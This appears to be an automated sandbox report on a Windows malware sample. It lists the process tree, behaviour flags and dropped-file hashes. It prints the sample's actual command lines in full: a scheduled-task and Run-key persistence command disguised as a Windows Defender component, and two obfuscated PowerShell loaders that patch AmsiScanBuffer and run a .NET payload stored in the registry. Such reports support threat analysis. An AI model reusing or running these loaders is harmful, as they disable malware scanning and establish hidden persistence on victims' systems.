C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4972 -ip 49721⤵PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:eWeaOgdfVQBO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aflNzVHGWgjtPW,[Parameter(Position=1)][Type]$SzyZOOuJDy)$NckIWEVLpjq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+'le'+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'ele'+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+'g'+'a'+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+'s'+'s'+','+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NckIWEVLpjq.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$NckIWEVLpjq.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'e'+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$SzyZOOuJDy,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $NckIWEVLpjq.CreateType();}$FiQVseZHmcrEQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](70)+''+[Char](105)+''+[Char](81)+''+[Char](86)+''+[Char](115)+''+[Char](101)+'ZHm'+[Char](99)+''+'r'+''+[Char](69)+''+[Char](81)+'');$tDKQEAecAKpDSk=$FiQVseZHmcrEQ.GetMethod('t'+[Char](68)+''+'K'+''+[Char](81)+''+[Char](69)+''+'A'+'e'+[Char](99)+''+'A'+''+[Char](75)+''+'p'+''+[Char](68)+''+'S'+''+[Char](107)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'tat'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lXUaFQdqAAQVbGRixsq=eWeaOgdfVQBO @([String])([IntPtr]);$LHRtmVjqTPAbpFqMwmfyjB=eWeaOgdfVQBO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jfspRDyfqCf=$FiQVseZHmcrEQ.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$SEFZsKozODJUll=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$nPGxHRUaehtPCFxHD=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$HintsWL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SEFZsKozODJUll,$lXUaFQdqAAQVbGRixsq).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$RKbcduaSFzIclxOFO=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$HintsWL,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$WNqtTcIiAS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,4,[ref]$WNqtTcIiAS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RKbcduaSFzIclxOFO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,0x20,[ref]$WNqtTcIiAS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+'s'+'t'+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ViwCWEanVVqb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EAAEmsKMTEgoCb,[Parameter(Position=1)][Type]$GhbKKLhkFZ)$xmRXvMlVtQr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$xmRXvMlVtQr.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');$xmRXvMlVtQr.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'B'+'y'+'S'+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$GhbKKLhkFZ,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $xmRXvMlVtQr.CreateType();}$usxCwMzOzvloc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+'32.U'+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](117)+''+[Char](115)+''+'x'+'C'+[Char](119)+''+[Char](77)+''+[Char](122)+'O'+[Char](122)+''+'v'+''+[Char](108)+''+[Char](111)+'c');$BoTDRYcMewqGUm=$usxCwMzOzvloc.GetMethod(''+[Char](66)+''+[Char](111)+''+[Char](84)+'D'+'R'+''+[Char](89)+''+[Char](99)+''+[Char](77)+''+[Char](101)+'wqG'+'U'+''+'m'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhzMlEZlNqCuLjVWETS=ViwCWEanVVqb @([String])([IntPtr]);$IgqvZrhmVfCNjmiwoWexoO=ViwCWEanVVqb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OWhIoSqESyC=$usxCwMzOzvloc.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$fCinQfxyStNAWR=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+'y'+'A')));$mKpNNihjYnyPDLdHF=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'rote'+'c'+'t')));$apmDBEg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fCinQfxyStNAWR,$FhzMlEZlNqCuLjVWETS).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$vXfuVoDkBepvCwzQl=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$apmDBEg,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$JwNxtdLprj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,4,[ref]$JwNxtdLprj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vXfuVoDkBepvCwzQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,0x20,[ref]$JwNxtdLprj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4628
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD58db953c45ec05891aa6a450faceb6998
SHA1bbc9932e47ae87b7742b987af9d8431944473745
SHA2560778cb7b12d9df3d965a2063075fecaed05dad4bc3e911c915acfb0f57df87b1
SHA5120805325ad0bea82cd218719611da68dab274f7d140aa7c9613b2e7c7f3b347f39acc894819c953cbd9509a9dc2e339e31f3290ab8e74ccf93a5e68960b180a1c
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
119KB
MD5d7581dfed2ec35db8fb3af0568b7fedc
SHA12c592c3fada484378744960c6aa6c773f3320d4d
SHA256ac9057fdc650c801c3120613a20e0b03ce5a9c89708ef4a7026bd30df71c5ffd
SHA5129e8e601935051724a5993665ad25a509086f0d7343b32623e2479ae0216bfeeea66ec71b6761a93700a86a383dd0f3309a6edced1681c7596621c3808c3901fb
-
Filesize
119KB
MD5d7581dfed2ec35db8fb3af0568b7fedc
SHA12c592c3fada484378744960c6aa6c773f3320d4d
SHA256ac9057fdc650c801c3120613a20e0b03ce5a9c89708ef4a7026bd30df71c5ffd
SHA5129e8e601935051724a5993665ad25a509086f0d7343b32623e2479ae0216bfeeea66ec71b6761a93700a86a383dd0f3309a6edced1681c7596621c3808c3901fb